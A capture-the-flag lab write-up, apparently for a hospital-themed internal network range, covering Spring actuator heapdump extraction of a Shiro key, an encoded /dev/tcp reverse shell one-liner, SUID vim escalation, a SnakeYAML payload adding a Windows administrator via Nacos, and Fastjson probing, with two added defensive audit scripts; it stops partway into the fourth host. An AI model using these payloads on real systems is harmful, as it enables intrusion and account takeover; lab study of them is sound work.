Description: In this scenario you play a penetration tester sent to test a hospital's network security. Your goal is to gain access to every server in order to assess the organisation's security posture. The range has 4 flags spread across different hosts.

Tags: internal network penetration, Nacos, Shiro, Fastjson, Decrypt

Difficulty: easy

Internal address                Host or FQDN   Brief description
172.30.12.5                     Web01          Spring + Shiro
172.30.12.6                     Server02       Nacos
172.30.12.236 / 172.30.54.179   Web03          Fastjson
172.30.54.12                    Web04          Grafana + Postgresql

flag1 Entry point - 172.30.12.5

Start with fscan

http://39.99.147.102/actuator/heapdump

Download the heapdump file

E:\小工具\JDDump>java -jar JDumpSpider-1.1-SNAPSHOT-full.jar C:\Users\31702\Downloads\heapdump
===========================================
SpringDataSourceProperties
-------------
not found!

===========================================
WeblogicDataSourceConnectionPoolConfig
-------------
not found!

===========================================
MongoClient
-------------
not found!

===========================================
AliDruidDataSourceWrapper
-------------
not found!

===========================================
HikariDataSource
-------------
not found!

===========================================
RedisStandaloneConfiguration
-------------
not found!

===========================================
JedisClient
-------------
not found!

===========================================
CookieRememberMeManager(ShiroKey)
-------------
algMode = CBC, key = GAYysgMQhG7/CzIJlVpR2g==, algName = AES

===========================================
OriginTrackedMapPropertySource
-------------
management.endpoints.web.exposure.include = *
server.port = 8080
spring.thymeleaf.prefix = classpath:/templates/

===========================================
MutablePropertySources
-------------
awt.toolkit = sun.awt.X11.XToolkit
sun.boot.class.path = /usr/lib/jvm/java-8-openjdk-amd64/jre/lib/resources.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/rt.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/sunrsasign.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/jsse.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/jce.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/charsets.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/jfr.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/classes
java.protocol.handler.pkgs = org.springframework.boot.loader
sun.management.compiler = HotSpot 64-Bit Tiered Compilers
sun.cpu.isalist =
sun.jnu.encoding = UTF-8
java.runtime.version = 1.8.0_392-8u392-ga-1~20.04-b08
java.class.path = /app/login-1.0-SNAPSHOT.jar
path.separator = :
java.vm.vendor = Private Build
os.version = 5.4.0-164-generic
java.endorsed.dirs = /usr/lib/jvm/java-8-openjdk-amd64/jre/lib/endorsed
java.runtime.name = OpenJDK Runtime Environment
file.encoding = UTF-8
catalina.useNaming = false
spring.beaninfo.ignore = true
java.vm.specification.version = 1.8
os.name = Linux
java.vm.name = OpenJDK 64-Bit Server VM
local.server.port = null
user.country = US
java.vendor.url.bug = http://bugreport.sun.com/bugreport/
sun.java.command = /app/login-1.0-SNAPSHOT.jar
java.io.tmpdir = /tmp
catalina.home = /tmp/tomcat.5583964768902277512.8080
java.version = 1.8.0_392
user.home = /home/app
user.language = en
PID = 751
java.awt.printerjob = sun.print.PSPrinterJob
file.separator = /
catalina.base = /tmp/tomcat.5583964768902277512.8080
java.vm.info = mixed mode
java.specification.name = Java Platform API Specification
java.vm.specification.vendor = Oracle Corporation
java.awt.graphicsenv = sun.awt.X11GraphicsEnvironment
java.awt.headless = true
sun.io.unicode.encoding = UnicodeLittle
java.ext.dirs = /usr/lib/jvm/java-8-openjdk-amd64/jre/lib/ext:/usr/java/packages/lib/ext

===========================================
MapPropertySources
-------------
local.server.port = null

===========================================
ConsulPropertySources
-------------
not found!

===========================================
JavaProperties
-------------
java.util.logging.FileHandler.pattern = %h/java%u.log
awt.toolkit = sun.awt.X11.XToolkit
sun.cpu.isalist =
sun.jnu.encoding = UTF-8
sun.arch.data.model = 64
catalina.useNaming = false
security.overridePropertiesFile = true
security.provider.7 = com.sun.security.sasl.Provider
sun.boot.library.path = /usr/lib/jvm/java-8-openjdk-amd64/jre/lib/amd64
sun.java.command = /app/login-1.0-SNAPSHOT.jar
security.provider.9 = sun.security.smartcardio.SunPCSC
java.specification.vendor = Oracle Corporation
security.provider.1 = sun.security.provider.Sun
security.provider.2 = sun.security.rsa.SunRsaSign
security.provider.3 = sun.security.ec.SunEC
networkaddress.cache.negative.ttl = 10
security.provider.4 = com.sun.net.ssl.internal.ssl.Provider
security.provider.5 = com.sun.crypto.provider.SunJCE
security.provider.6 = sun.security.jgss.SunProvider
file.separator = /
org.springframework.web.servlet.HandlerExceptionResolver = org.springframework.web.servlet.mvc.method.annotation.ExceptionHandlerExceptionResolver,org.springframework.web.servlet.mvc.annotation.ResponseStatusExceptionResolver,org.springframework.web.servlet.mvc.support.DefaultHandlerExceptionResolver
java.specification.name = Java Platform API Specification
java.vm.specification.vendor = Oracle Corporation
org.springframework.web.servlet.HandlerMapping = org.springframework.web.servlet.handler.BeanNameUrlHandlerMapping,org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerMapping,org.springframework.web.servlet.function.support.RouterFunctionMapping
org.springframework.web.servlet.HandlerAdapter = org.springframework.web.servlet.mvc.HttpRequestHandlerAdapter,org.springframework.web.servlet.mvc.SimpleControllerHandlerAdapter,org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerAdapter,org.springframework.web.servlet.function.support.HandlerFunctionAdapter
org.springframework.web.servlet.FlashMapManager = org.springframework.web.servlet.support.SessionFlashMapManager
package.definition = sun.,com.sun.xml.internal.,com.sun.imageio.,com.sun.istack.internal.,com.sun.jmx.,com.sun.media.sound.,com.sun.naming.internal.,com.sun.proxy.,com.sun.corba.se.,com.sun.org.apache.bcel.internal.,com.sun.org.apache.regexp.internal.,com.sun.org.apache.xerces.internal.,com.sun.org.apache.xpath.internal.,com.sun.org.apache.xalan.internal.extensions.,com.sun.org.apache.xalan.internal.lib.,com.sun.org.apache.xalan.internal.res.,com.sun.org.apache.xalan.internal.templates.,com.sun.org.apache.xalan.internal.utils.,com.sun.org.apache.xalan.internal.xslt.,com.sun.org.apache.xalan.internal.xsltc.cmdline.,com.sun.org.apache.xalan.internal.xsltc.compiler.,com.sun.org.apache.xalan.internal.xsltc.trax.,com.sun.org.apache.xalan.internal.xsltc.util.,com.sun.org.apache.xml.internal.res.,com.sun.org.apache.xml.internal.resolver.helpers.,com.sun.org.apache.xml.internal.resolver.readers.,com.sun.org.apache.xml.internal.security.,com.sun.org.apache.xml.internal.serializer.utils.,com.sun.org.apache.xml.internal.utils.,com.sun.org.glassfish.,com.oracle.xmlns.internal.,com.oracle.webservices.internal.,oracle.jrockit.jfr.,org.jcp.xml.dsig.internal.,jdk.internal.,jdk.nashorn.internal.,jdk.nashorn.tools.,jdk.xml.internal.,com.sun.activation.registries.,jdk.jfr.events.,jdk.jfr.internal.,jdk.management.jfr.internal.
sun.boot.class.path = /usr/lib/jvm/java-8-openjdk-amd64/jre/lib/resources.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/rt.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/sunrsasign.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/jsse.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/jce.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/charsets.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/jfr.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/classes
java.protocol.handler.pkgs = org.springframework.boot.loader
sun.management.compiler = HotSpot 64-Bit Tiered Compilers
org.springframework.web.servlet.ThemeResolver = org.springframework.web.servlet.theme.FixedThemeResolver
java.runtime.version = 1.8.0_392-8u392-ga-1~20.04-b08
user.name = app
policy.url.1 = file:${java.home}/lib/security/java.policy
securerandom.source = file:/dev/random
policy.url.2 = file:${user.home}/.java.policy
jdk.tls.disabledAlgorithms = SSLv3, TLSv1, TLSv1.1, RC4, DES, MD5withRSA, DH keySize < 1024, EC keySize < 224, 3DES_EDE_CBC, anon, NULL, include jdk.disabled.namedCurves
policy.ignoreIdentityScope = false
file.encoding = UTF-8
java.util.logging.ConsoleHandler.formatter = java.util.logging.SimpleFormatter
jdk.sasl.disabledMechanisms =
java.io.tmpdir = /tmp
org.springframework.web.servlet.ViewResolver = org.springframework.web.servlet.view.InternalResourceViewResolver
java.version = 1.8.0_392
jdk.tls.keyLimits = AES/GCM/NoPadding KeyUpdate 2^37
PID = 751
java.vm.specification.name = Java Virtual Machine Specification
java.awt.printerjob = sun.print.PSPrinterJob
jdk.xml.dsig.secureValidationPolicy = disallowAlg http://www.w3.org/TR/1999/REC-xslt-19991116,disallowAlg http://www.w3.org/2001/04/xmldsig-more#rsa-md5,disallowAlg http://www.w3.org/2001/04/xmldsig-more#hmac-md5,disallowAlg http://www.w3.org/2001/04/xmldsig-more#md5,maxTransforms 5,maxReferences 30,disallowReferenceUriSchemes file http https,minKeySize RSA 1024,minKeySize DSA 1024,minKeySize EC 224,noDuplicateIds,noRetrievalMethodLoops
java.library.path = /usr/java/packages/lib/amd64:/usr/lib/x86_64-linux-gnu/jni:/lib/x86_64-linux-gnu:/usr/lib/x86_64-linux-gnu:/usr/lib/jni:/lib:/usr/lib
java.vendor = Private Build
handlers = java.util.logging.ConsoleHandler
java.specification.maintenance.version = 5
sun.io.unicode.encoding = UnicodeLittle
krb5.kdc.bad.policy = tryLast
java.class.path = /app/login-1.0-SNAPSHOT.jar
jdk.security.legacyAlgorithms = SHA1, RSA keySize < 2048, DSA keySize < 2048
java.vm.vendor = Private Build
jdk.disabled.namedCurves = secp112r1, secp112r2, secp128r1, secp128r2, secp160k1, secp160r1, secp160r2, secp192k1, secp192r1, secp224k1, secp224r1, secp256k1, sect113r1, sect113r2, sect131r1, sect131r2, sect163k1, sect163r1, sect163r2, sect193r1, sect193r2, sect233k1, sect233r1, sect239k1, sect283k1, sect283r1, sect409k1, sect409r1, sect571k1, sect571r1, X9.62 c2tnb191v1, X9.62 c2tnb191v2, X9.62 c2tnb191v3, X9.62 c2tnb239v1, X9.62 c2tnb239v2, X9.62 c2tnb239v3, X9.62 c2tnb359v1, X9.62 c2tnb431r1, X9.62 prime192v2, X9.62 prime192v3, X9.62 prime239v1, X9.62 prime239v2, X9.62 prime239v3, brainpoolP256r1, brainpoolP320r1, brainpoolP384r1, brainpoolP512r1
crypto.policy = unlimited
jceks.key.serialFilter = java.lang.Enum;java.security.KeyRep;java.security.KeyRep$Type;javax.crypto.spec.SecretKeySpec;!*
login.configuration.provider = sun.security.provider.ConfigFile
user.timezone =
java.vm.specification.version = 1.8
os.name = Linux
user.country = US
jdk.security.caDistrustPolicies = SYMANTEC_TLS
sun.cpu.endian = little
user.home = /home/app
user.language = en
en = UTF-8
jdk.tls.alpnCharset = ISO_8859_1
ssl.KeyManagerFactory.algorithm = SunX509
.level = INFO
java.awt.graphicsenv = sun.awt.X11GraphicsEnvironment
java.awt.headless = true
com.xyz.foo.level = SEVERE
policy.provider = sun.security.provider.PolicyFile
path.separator = :
fr = UTF-8
os.version = 5.4.0-164-generic
java.endorsed.dirs = /usr/lib/jvm/java-8-openjdk-amd64/jre/lib/endorsed
java.runtime.name = OpenJDK Runtime Environment
keystore.type.compat = true
org.springframework.web.servlet.RequestToViewNameTranslator = org.springframework.web.servlet.view.DefaultRequestToViewNameTranslator
spring.beaninfo.ignore = true
java.vm.name = OpenJDK 64-Bit Server VM
java.vendor.url.bug = http://bugreport.sun.com/bugreport/
java.util.logging.FileHandler.formatter = java.util.logging.XMLFormatter
java.util.logging.FileHandler.count = 1
catalina.home = /tmp/tomcat.5583964768902277512.8080
sun.cds.enableSharedLookupCache = false
sun.security.krb5.maxReferrals = 5
catalina.base = /tmp/tomcat.5583964768902277512.8080
java.util.logging.FileHandler.limit = 50000
java.vm.info = mixed mode, sharing
keystore.type = jks
java.ext.dirs = /usr/lib/jvm/java-8-openjdk-amd64/jre/lib/ext:/usr/java/packages/lib/ext
policy.expandProperties = true
securerandom.strongAlgorithms = NativePRNGBlocking:SUN

===========================================
ProcessEnvironment
-------------
not found!

===========================================
OSS
-------------
not found!

===========================================
UserPassSearcher
-------------
org.apache.shiro.web.filter.authc.FormAuthenticationFilter:
[failureKeyAttribute = shiroLoginFailure, loginUrl = /login, successUrl = /, usernameParam = username, passwordParam = password]

org.apache.catalina.startup.Tomcat:
[hostname = localhost]


===========================================
CookieThief
-------------
not found!

===========================================
AuthThief
-------------
not found!

===========================================
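The heapdump above exposes both the Shiro rememberMe key and the setting that made it reachable, management.endpoints.web.exposure.include = *. Added here as a defender-side check, not code from the writeup or from Spring: a small audit that parses application.properties text (the keys are Spring Boot's own; the sample values are constructed from the dump above) and reports which secret-bearing actuator endpoints are served over HTTP, alongside a hardened configuration that passes.

```python
"""Audit Spring Boot Actuator exposure as revealed by the heapdump above.

Added example, not code from the original writeup or from Spring. It parses
application.properties text (the same keys JDumpSpider pulled from the
OriginTrackedMapPropertySource) and reports which secret-bearing actuator
endpoints are reachable, then shows a hardened configuration that is clean.
"""
import re

# Spring Boot endpoint ids whose output leaks credentials, keys or memory.
SENSITIVE_ENDPOINTS = {"heapdump", "env", "configprops", "threaddump",
                       "mappings", "beans", "loggers", "shutdown"}

# Constructed sample: exactly the property values recovered from the target.
SAMPLE_PROPERTIES = """
management.endpoints.web.exposure.include = *
server.port = 8080
spring.thymeleaf.prefix = classpath:/templates/
"""

# Hardened form: expose only health/info, disable the dump endpoints outright,
# and move the management port off the application port.
HARDENED_PROPERTIES = """
management.endpoints.web.exposure.include = health,info
management.endpoint.heapdump.enabled = false
management.endpoint.env.enabled = false
management.server.port = 8081
server.port = 8080
"""


def parse_properties(text: str) -> dict:
    """Minimal .properties reader: 'key = value' or 'key=value', comments skipped."""
    props = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line[0] in "#!":
            continue
        m = re.match(r"([^=:\s]+)\s*[=:]\s*(.*)$", line)
        if m:
            props[m.group(1)] = m.group(2).strip()
    return props


def _as_set(value: str) -> set:
    return {v.strip() for v in value.split(",") if v.strip()}


def exposed_endpoints(props: dict) -> set:
    """Sensitive endpoint ids served over HTTP under this configuration."""
    include = _as_set(props.get("management.endpoints.web.exposure.include", "health"))
    exclude = _as_set(props.get("management.endpoints.web.exposure.exclude", ""))
    candidates = set(SENSITIVE_ENDPOINTS) if "*" in include else include & SENSITIVE_ENDPOINTS
    candidates -= exclude
    # management.endpoint.<id>.enabled=false removes the endpoint entirely
    return {e for e in candidates
            if props.get(f"management.endpoint.{e}.enabled", "true").lower() != "false"}


def audit(props: dict) -> list:
    """Human-readable findings; an empty list means the config passes."""
    findings = []
    if "*" in _as_set(props.get("management.endpoints.web.exposure.include", "health")):
        findings.append("exposure.include is '*': every actuator endpoint is served over the web")
    for ep in sorted(exposed_endpoints(props)):
        findings.append(f"sensitive endpoint reachable: /actuator/{ep}")
    app_port = props.get("server.port", "8080")
    if props.get("management.server.port", app_port) == app_port:
        findings.append("actuator shares the application port; set management.server.port "
                        "to a port reachable only from the management network")
    return findings


if __name__ == "__main__":
    for label, text in (("target", SAMPLE_PROPERTIES), ("hardened", HARDENED_PROPERTIES)):
        print(label, audit(parse_properties(text)) or ["no findings"])
```

The Shiro key itself is a separate finding: a key that sits in a heap dump or a properties file is recoverable by anyone who can reach the dump, so it belongs in a secret store and must be rotated after an exposure like this one.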

Inject a memory shell

Reverse shell

bash -c '{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC95b3VyX2lwLzUwMDAgMD4mMQ==}|{base64,-d}|{bash,-i}'

app@web01:~$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/usr/bin/vim.basic
/usr/bin/su
/usr/bin/newgrp
/usr/bin/staprun
/usr/bin/at
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/umount
/usr/bin/chfn
/usr/bin/stapbpf
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/fusermount
/usr/bin/mount
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device

/usr/bin/vim.basic is SUID, so write a public key and connect over SSH

Got flag1

Upload fscan and start scanning

root@web01:/tmp# ./fscan -h 172.30.12.5/24
┌──────────────────────────────────────────────┐
│ ___ _ │
│ / _ \ ___ ___ _ __ __ _ ___| | __ │
│ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │
│ / /_\\_____\__ \ (__| | | (_| | (__| < │
│ \____/ |___/\___|_| \__,_|\___|_|\_\ │
└──────────────────────────────────────────────┘
Fscan Version: 2.0.0

[2025-04-23 15:17:41] [INFO] 暴力破解线程数: 1
[2025-04-23 15:17:41] [INFO] 开始信息扫描
[2025-04-23 15:17:42] [INFO] CIDR范围: 172.30.12.0-172.30.12.255
[2025-04-23 15:17:42] [INFO] 生成IP范围: 172.30.12.0.%!d(string=172.30.12.255) - %!s(MISSING).%!d(MISSING)
[2025-04-23 15:17:42] [INFO] 解析CIDR 172.30.12.5/24 -> IP范围 172.30.12.0-172.30.12.255
[2025-04-23 15:17:42] [INFO] 最终有效主机数量: 256
[2025-04-23 15:17:42] [INFO] 开始主机扫描
[2025-04-23 15:17:42] [SUCCESS] 目标 172.30.12.5 存活 (ICMP)
[2025-04-23 15:17:42] [SUCCESS] 目标 172.30.12.6 存活 (ICMP)
[2025-04-23 15:17:42] [SUCCESS] 目标 172.30.12.236 存活 (ICMP)
[2025-04-23 15:17:45] [INFO] 存活主机数量: 3
[2025-04-23 15:17:45] [INFO] 有效端口数量: 233
[2025-04-23 15:17:45] [SUCCESS] 端口开放 172.30.12.6:135
[2025-04-23 15:17:45] [SUCCESS] 端口开放 172.30.12.6:139
[2025-04-23 15:17:45] [SUCCESS] 端口开放 172.30.12.6:445
[2025-04-23 15:17:45] [SUCCESS] 端口开放 172.30.12.236:22
[2025-04-23 15:17:45] [SUCCESS] 端口开放 172.30.12.5:22
[2025-04-23 15:17:45] [SUCCESS] 端口开放 172.30.12.236:8009
[2025-04-23 15:17:45] [SUCCESS] 端口开放 172.30.12.236:8080
[2025-04-23 15:17:45] [SUCCESS] 端口开放 172.30.12.5:8080
[2025-04-23 15:17:45] [SUCCESS] 端口开放 172.30.12.6:8848
[2025-04-23 15:17:45] [SUCCESS] 服务识别 172.30.12.236:22 => [ssh] 版本:8.2p1 Ubuntu 4ubuntu0.9 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.9.]
[2025-04-23 15:17:45] [SUCCESS] 服务识别 172.30.12.5:22 => [ssh] 版本:8.2p1 Ubuntu 4ubuntu0.9 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.9.]
[2025-04-23 15:17:50] [SUCCESS] 服务识别 172.30.12.6:139 => Banner:[.]
[2025-04-23 15:17:50] [SUCCESS] 服务识别 172.30.12.6:445 =>
[2025-04-23 15:17:50] [SUCCESS] 服务识别 172.30.12.236:8009 =>
[2025-04-23 15:17:50] [SUCCESS] 服务识别 172.30.12.5:8080 => [http]
[2025-04-23 15:17:51] [SUCCESS] 服务识别 172.30.12.236:8080 => [http]
[2025-04-23 15:17:55] [SUCCESS] 服务识别 172.30.12.6:8848 => [http]
[2025-04-23 15:18:50] [SUCCESS] 服务识别 172.30.12.6:135 =>
[2025-04-23 15:18:50] [INFO] 存活端口数量: 9
[2025-04-23 15:18:50] [INFO] 开始漏洞扫描
[2025-04-23 15:18:50] [INFO] 加载的插件: findnet, ms17010, netbios, smb, smb2, smbghost, ssh, webpoc, webtitle
[2025-04-23 15:18:50] [SUCCESS] NetInfo 扫描结果
目标主机: 172.30.12.6
主机名: Server02
发现的网络接口:
IPv4地址:
└─ 172.30.12.6
[2025-04-23 15:18:50] [SUCCESS] NetBios 172.30.12.6 WORKGROUP\SERVER02
[2025-04-23 15:18:50] [SUCCESS] 网站标题 http://172.30.12.5:8080 状态码:302 长度:0 标题:无标题 重定向地址: http://172.30.12.5:8080/login;jsessionid=BDEBB22E581B3680D2A730C6323BA0D3
[2025-04-23 15:18:50] [SUCCESS] 网站标题 http://172.30.12.236:8080 状态码:200 长度:3964 标题:医院后台管理平台
[2025-04-23 15:18:50] [SUCCESS] 网站标题 http://172.30.12.6:8848 状态码:404 长度:431 标题:HTTP Status 404 – Not Found
[2025-04-23 15:18:51] [SUCCESS] 网站标题 http://172.30.12.5:8080/login;jsessionid=BDEBB22E581B3680D2A730C6323BA0D3 状态码:200 长度:2005 标题:医疗管理后台
[2025-04-23 15:18:51] [SUCCESS] 目标: http://172.30.12.6:8848
漏洞类型: poc-yaml-alibaba-nacos
漏洞名称:
详细信息:
author:AgeloVito
links:https://blog.csdn.net/caiqiiqi/article/details/112005424
[2025-04-23 15:18:52] [SUCCESS] 目标: http://172.30.12.6:8848
漏洞类型: poc-yaml-alibaba-nacos-v1-auth-bypass
漏洞名称:
详细信息:
author:kmahyyg(https://github.com/kmahyyg)
links:https://github.com/alibaba/nacos/issues/4593
[2025-04-23 15:18:52] [SUCCESS] 目标: http://172.30.12.5:8080
漏洞类型: poc-yaml-spring-actuator-heapdump-file
漏洞名称:
详细信息:
author:AgeloVito
links:https://www.cnblogs.com/wyb628/p/8567610.html

flag2 Nacos - 172.30.12.6

Log in with the weak default credentials nacos/nacos

Modify artsploit/yaml-payload (a tiny project for generating SnakeYAML deserialization payloads)

Change the exec call so that it adds an admin user

public AwesomeScriptEngineFactory() {
    try {
        Runtime.getRuntime().exec("net user yiyi yiyi /add");
        Runtime.getRuntime().exec("net localgroup administrators yiyi /add");
    } catch (IOException e) {
        e.printStackTrace();
    }
}

Package it

E:\小工具\漏洞复现\yaml-payload-master\yaml-payload-master>javac src/artsploit/AwesomeScriptEngineFactory.java

E:\小工具\漏洞复现\yaml-payload-master\yaml-payload-master>jar -cvf yaml-payload.jar -C src/ .
已添加清单
正在添加: artsploit/(输入 = 0) (输出 = 0)(存储了 0%)
正在添加: artsploit/AwesomeScriptEngineFactory.class(输入 = 1674) (输出 = 702)(压缩了 58%)
正在添加: artsploit/AwesomeScriptEngineFactory.java(输入 = 1565) (输出 = 410)(压缩了 73%)
正在忽略条目META-INF/
正在添加: META-INF/services/(输入 = 0) (输出 = 0)(存储了 0%)
正在添加: META-INF/services/javax.script.ScriptEngineFactory(输入 = 36) (输出 = 38)(压缩了 -5%)

Connect over RDP and get flag2

flag3 Hospital back-office management platform - 172.30.12.236

http://172.30.12.236:8080/

Capturing the login request in Burp shows that the data is sent as JSON, so we guess Fastjson

payload

{"@type": "java.lang.AutoCloseable"

The error response reveals the version
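The probe above is a deliberately unterminated JSON object whose only key is @type; it is exactly the kind of request a WAF rule or a server-side filter should flag. Added here as a defender-side example (not code from the writeup or from Fastjson): a classifier for request bodies that catches this truncated probe as well as well-formed bodies that hide the @type key behind the \u0040 and \x40 escapes Fastjson's lexer accepts. The class names in the samples are constructed placeholders.

```python
"""Flag Fastjson autoType probes in JSON request bodies.

Added example, not code from the original writeup or from Fastjson. It inspects a
request body the way a WAF rule or a server-side filter would: it recognises the
truncated '{"@type": "java.lang.AutoCloseable"' version probe used above and also
well-formed bodies that hide the @type key behind the \\u0040 / \\x40 escapes that
Fastjson's lexer accepts. Class names in the samples are constructed placeholders.
"""
import json
import re

# Escapes Fastjson decodes to '@' before it looks for the autoType key.
_AT_ESCAPES = re.compile(r"\\u0040|\\x40", re.IGNORECASE)
_TYPE_KEY = re.compile(r'"@type"\s*:\s*"([^"]*)')
VERSION_PROBE_CLASS = "java.lang.AutoCloseable"


def normalise(body: str) -> str:
    """Undo the escape forms so a single pattern catches all spellings of @type."""
    return _AT_ESCAPES.sub("@", body)


def find_autotype(body: str) -> list:
    """Class names requested via @type anywhere in the body ([] if none).

    Parses real JSON when it can and walks every nested object; the version probe
    is deliberately truncated (no closing brace), so invalid JSON falls back to a
    tolerant regex instead of being waved through.
    """
    text = normalise(body)
    try:
        obj = json.loads(text)
    except ValueError:
        return _TYPE_KEY.findall(text)
    classes, stack = [], [obj]
    while stack:
        node = stack.pop()
        if isinstance(node, dict):
            if "@type" in node:
                classes.append(str(node["@type"]))
            stack.extend(node.values())
        elif isinstance(node, list):
            stack.extend(node)
    return classes


def classify(body: str) -> str:
    """'clean', 'fastjson-version-probe' or 'fastjson-autotype'."""
    classes = find_autotype(body)
    if not classes:
        return "clean"
    if VERSION_PROBE_CLASS in classes:
        # The unfinished AutoCloseable body makes Fastjson throw, and the error
        # text it returns discloses the library version (the step shown above).
        return "fastjson-version-probe"
    return "fastjson-autotype"


# Constructed request bodies: a normal login, the probe from the writeup, and
# escaped, nested autoType keys pointing at a placeholder class name.
SAMPLE_REQUESTS = [
    ('{"username":"alice","password":"hunter2"}', "clean"),
    ('{"@type": "java.lang.AutoCloseable"', "fastjson-version-probe"),
    ('{"user":{"\\u0040type":"com.example.PlaceholderBean","id":7}}', "fastjson-autotype"),
    ('{"user":{"\\x40type":"com.example.PlaceholderBean"}}', "fastjson-autotype"),
]

if __name__ == "__main__":
    for body, expected in SAMPLE_REQUESTS:
        print(f"{classify(body):25s} expected={expected}  {body}")
```

Detection complements the fix: Fastjson 1.2.68 and later can run with safeMode (-Dfastjson.parser.safeMode=true), which disables autoType entirely, and error pages should not echo library exception text back to the client.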

Use the Burp plugin to inject a memory shell directly

Got flag3

flag4 Grafana - 172.30.54.12

Write a public key to make the later steps easier

root@web01:~/.ssh# ssh-keygen -t rsa -b 2048 -C "your_email@example.com"
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa):
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /root/.ssh/id_rsa
Your public key has been saved in /root/.ssh/id_rsa.pub
The key fingerprint is:
SHA256:yA38ufRBF9n0rHoPopRFQhM4I4IpT2R6N9HjTGaBTic your_email@example.com
The key's randomart image is:
+---[RSA 2048]----+
| .oo.o.. .+..+. |
|.o+ EoO +. ....o |
|.+.ooXoo oo o o|
| ....oo= o + . |
| o S . . . |
| . o + . |
| . + o o |
| . . o o |
| . .|
+----[SHA256]-----+

Run an fscan scan

root@web03:~# wget http://172.30.12.5:8000/fscan
--2025-04-23 16:02:25-- http://172.30.12.5:8000/fscan
Connecting to 172.30.12.5:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 8585724 (8.2M) [application/octet-stream]
Saving to: ‘fscan’

fscan 100%[=======================================================================================================>] 8.19M --.-KB/s in 0.02s

2025-04-23 16:02:25 (402 MB/s) - ‘fscan’ saved [8585724/8585724]

root@web03:~# ls
apache-tomcat-8.5.32 flag fscan
root@web03:~# chmod 777 fscan
root@web03:~# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:16:3e:1f:23:06 brd ff:ff:ff:ff:ff:ff
inet 172.30.12.236/16 brd 172.30.255.255 scope global dynamic eth0
valid_lft 315356428sec preferred_lft 315356428sec
inet6 fe80::216:3eff:fe1f:2306/64 scope link
valid_lft forever preferred_lft forever
3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:16:3e:1f:21:9e brd ff:ff:ff:ff:ff:ff
inet 172.30.54.179/24 brd 172.30.54.255 scope global eth1
valid_lft forever preferred_lft forever
inet6 fe80::216:3eff:fe1f:219e/64 scope link
valid_lft forever preferred_lft forever
root@web03:~# ./fscan -h 172.30.54.179/24
┌──────────────────────────────────────────────┐
│ ___ _ │
│ / _ \ ___ ___ _ __ __ _ ___| | __ │
│ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │
│ / /_\\_____\__ \ (__| | | (_| | (__| < │
│ \____/ |___/\___|_| \__,_|\___|_|\_\ │
└──────────────────────────────────────────────┘
Fscan Version: 2.0.0

[2025-04-23 16:02:53] [INFO] 暴力破解线程数: 1
[2025-04-23 16:02:53] [INFO] 开始信息扫描
[2025-04-23 16:02:53] [INFO] CIDR范围: 172.30.54.0-172.30.54.255
[2025-04-23 16:02:53] [INFO] 生成IP范围: 172.30.54.0.%!d(string=172.30.54.255) - %!s(MISSING).%!d(MISSING)
[2025-04-23 16:02:53] [INFO] 解析CIDR 172.30.54.179/24 -> IP范围 172.30.54.0-172.30.54.255
[2025-04-23 16:02:54] [INFO] 最终有效主机数量: 256
[2025-04-23 16:02:54] [INFO] 开始主机扫描
[2025-04-23 16:02:54] [SUCCESS] 目标 172.30.54.179 存活 (ICMP)
[2025-04-23 16:02:54] [SUCCESS] 目标 172.30.54.12 存活 (ICMP)
[2025-04-23 16:02:57] [INFO] 存活主机数量: 2
[2025-04-23 16:02:57] [INFO] 有效端口数量: 233
[2025-04-23 16:02:57] [SUCCESS] 端口开放 172.30.54.12:5432
[2025-04-23 16:02:57] [SUCCESS] 端口开放 172.30.54.12:3000
[2025-04-23 16:02:57] [SUCCESS] 端口开放 172.30.54.12:22
[2025-04-23 16:02:57] [SUCCESS] 端口开放 172.30.54.179:8009
[2025-04-23 16:02:57] [SUCCESS] 端口开放 172.30.54.179:8080
[2025-04-23 16:02:57] [SUCCESS] 端口开放 172.30.54.179:22
[2025-04-23 16:02:57] [SUCCESS] 服务识别 172.30.54.12:22 => [ssh] 版本:8.2p1 Ubuntu 4ubuntu0.9 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.9.]
